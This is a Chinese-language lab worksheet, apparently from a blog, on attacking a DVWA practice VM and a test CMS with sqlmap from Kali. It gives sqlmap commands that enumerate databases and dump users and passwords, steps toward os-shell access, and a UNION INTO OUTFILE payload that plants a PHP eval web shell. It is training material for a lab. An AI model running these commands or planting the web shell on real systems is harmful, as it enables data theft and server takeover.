使用sqlmap
实验环境要求:
1、安装win7或win10的笔记本或PC电脑一台,硬盘100GB,内存8GB
2、安装VMware Workstation 14以上
总体目标:基于centos7搭建dvwa web服务靶机,使用主机上的浏览器和kali虚拟机作为攻击机。使用kali中的sqlmap攻击dvwa上的sql注入和sql盲注漏洞。
任务一、使用kali中的sqlmap攻击dvwa中sql注入漏洞(low)
- 测试dvwa注入点,截图
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"
- 列出所有数据库,截图
- 获取数据表,截图
- 获取数据,截图
- 获取所有管理用户,截图
- 获取用户密码,截图
任务二、使用kali中的sqlmap攻击dvwa中sql注入漏洞(medium)
- 测试dvwa注入点,截图
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"
观察可以看出为POST表单
使用Burp劫获POST信息
将信息保存成文件
使用文件进行攻击
- 列出所有数据库,截图
- 获取数据表,截图
- 获取数据,截图
- 获取所有管理用户,截图
- 获取用户密码,截图
任务三、使用kali中的sqlmap攻击dvwa中sql注入漏洞(high)
- 测试dvwa注入点,截图
sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=high;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"
观察页面信息为POST表单
原始方法肯定不行,所以再试试刚才的方法
保持请求
试过后发现失败
查看源码后使用二阶SQL注入—second-order
- 列出所有数据库,截图
- 获取数据表,截图
- 获取数据,截图
- 获取所有管理用户,截图
- 获取用户密码,截图
拓展任务一、使用kali中的sqlmap攻击cms中sql注入漏洞
- 测试cms注入点,截图
sqlmap -u http://192.168.91.80/cms/show.php?id=1
- 列出所有数据库,截图
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –dbs
- 获取数据表,截图
sqlmap -u http://192.168.91.80/cms/show.php?id=1 -D dvwa –tables
- 获取数据,截图
sqlmap -u http://192.168.91.80/cms/show.php?id=1 --dump -D dvwa
- 获取所有管理用户,截图
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –users
- 获取用户密码,截图
sqlmap -u http://192.168.91.80/cms/show.php?id=1 –passwords
拓展任务二、通过sql注入漏洞获取sql-shell和os-shell
- 使用sqlmap查看当前用户是否为dba,截图
- 使用sqlmap获取sql-shell,截图
- 使用sqlmap获取os-shell,截图
直接使用命令是错误的
我们需要在靶机修改一些参数来实现
重启服务
- 通过sql注入漏洞上传一句话木马,截图
1' union select 1,"<?php @eval($_POST['pass']);?>" INTO OUTFILE "/var/www/html/dvwa/hack.php" #
执行不了说明没有权限,修改dvwa文件权限
最新文章
- T-Sql(四)表关联和视图(view)
- linux下进程突然断掉后的日志查询
- Power BI for Office 365介绍
- Waiting Processed Cancelable ShowDialog
- java 发送带Basic Auth认证的http post请求
- Sublime Text3 插件集合
- Codeforces Round #267 Div.2 D Fedor and Essay -- 强连通 DFS
- javascrip笔记——图片加载
- PHPCMS GET标签使用
- 双人贪吃蛇小游戏C++原创
- 【转】Win7下VS2010中配置Opencv2.4.4的方法(32位和64位都有效)(亲测成功)
- csvkit---python一个牛逼到不行的csv处理库
- Eclipse中将含有图片资源的项目打包成jar文件
- Redis基本认识和基础学习-基本命令
- C++笔记010:C++对C的扩展——register关键字增强
- Flutter 即学即用系列博客——03 在旧有项目引入 Flutter
- ssh远程访问失败 Centos7
- 解决挂载nfs共享目录失败的问题
- 依赖注入[7]: .NET Core DI框架[服务注册]
- GIL